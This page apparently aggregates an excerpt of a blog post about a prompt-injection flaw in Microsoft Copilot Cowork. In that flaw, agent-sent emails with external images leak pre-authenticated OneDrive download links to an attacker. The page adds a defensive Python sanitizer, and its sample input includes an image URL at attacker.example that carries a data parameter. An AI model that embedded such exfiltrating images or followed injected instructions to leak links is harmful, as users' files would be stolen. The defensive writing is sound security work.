Microsoft Copilot Cowork Exfiltrates Files

Simon Willison
⚡ TL;DR · AI summary

Microsoft Copilot Cowork has been found to have vulnerabilities that could allow data exfiltration. The system permits agents to send emails to users' inboxes, which can be exploited to leak sensitive information. This issue arises from the ability of these emails to include external images that trigger network requests, potentially exposing user data.

Original article
Simon Willison's Weblog · Simon Willison
Opening excerpt (first ~120 words)

Microsoft Copilot Cowork Exfiltrates Files (via) The biggest challenge in designing agentic systems continues to be preventing them from enabling attackers to exfiltrate data. In this case Microsoft Copilot Cowork (yes, that's a real product name) was allowing agents to send emails to the user's own inbox without approval... but those messages were then rendered in a way that could leak data to an attacker via rendered images: Because these messages can contain external images that trigger network requests to external websites, data can be exfiltrated when a user opens a compromised message sent by the agent. Since OneDrive can create pre-authenticated download links, a successful prompt injection could cause those links to be leaked, allowing files to be downloaded by the attacker.

Excerpt limited to ~120 words for fair-use compliance. The full article is at Simon Willison's Weblog.
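
The leak described in the excerpt depends on the mail client fetching external images when the agent-sent message is opened. As an added example (not from Simon Willison's post or any Microsoft code), this Python filter strips auto-fetching attributes that point outside an allowlist from agent-authored HTML before it is rendered. The allowlisted host `images.corp.example`, the function names and the sample message are assumptions constructed here, and `<style>` blocks are not handled.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit
ALLOWED_HOSTS = {"images.corp.example"}  # assumption: tenant-approved image host
AUTO_FETCH = {"src", "srcset", "background", "poster"}  # fetched when the message opens

def leaves_allowlist(value):
    """True if any URL in the attribute value points at a host outside the allowlist."""
    for candidate in value.split(","):  # srcset is a comma-separated list
        parts = candidate.split() or [""]
        try:
            url = urlsplit(parts[0])
        except ValueError:  # unparseable URL: refuse it
            return True
        if url.netloc and url.hostname not in ALLOWED_HOSTS:
            return True
    return False

class AgentMailSanitizer(HTMLParser):
    """Re-serialises HTML without remote-fetch attributes; comments are not re-emitted."""
    def __init__(self):
        super().__init__(convert_charrefs=False)
        self.out, self.blocked = [], []
    def _emit(self, tag, attrs, close=""):
        kept = []
        for name, value in attrs:
            value = value or ""
            css_fetch = name == "style" and "url(" in value.lower()
            if css_fetch or (name in AUTO_FETCH and leaves_allowlist(value)):
                self.blocked.append((tag, name, value))  # keep for logging/alerting
                continue
            kept.append(f' {name}="{escape(value)}"')
        self.out.append(f"<{tag}{''.join(kept)}{close}>")
    def handle_starttag(self, tag, attrs): self._emit(tag, attrs)
    def handle_startendtag(self, tag, attrs): self._emit(tag, attrs, " /")
    def handle_endtag(self, tag): self.out.append(f"</{tag}>")
    def handle_data(self, data): self.out.append(data)
    def handle_entityref(self, name): self.out.append(f"&{name};")
    def handle_charref(self, name): self.out.append(f"&#{name};")

def sanitize_agent_html(html):
    """Return (safe_html, blocked) for a message body written by an agent."""
    parser = AgentMailSanitizer()
    parser.feed(html)
    parser.close()
    return "".join(parser.out), parser.blocked

# Constructed sample: one remote image with a placeholder query, one allowed, one inline.
SAMPLE = ('<p>Weekly summary</p><img src="https://attacker.example/p.png?d=PLACEHOLDER">'
          '<img src="https://images.corp.example/logo.png"><img src="cid:chart1">')
```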
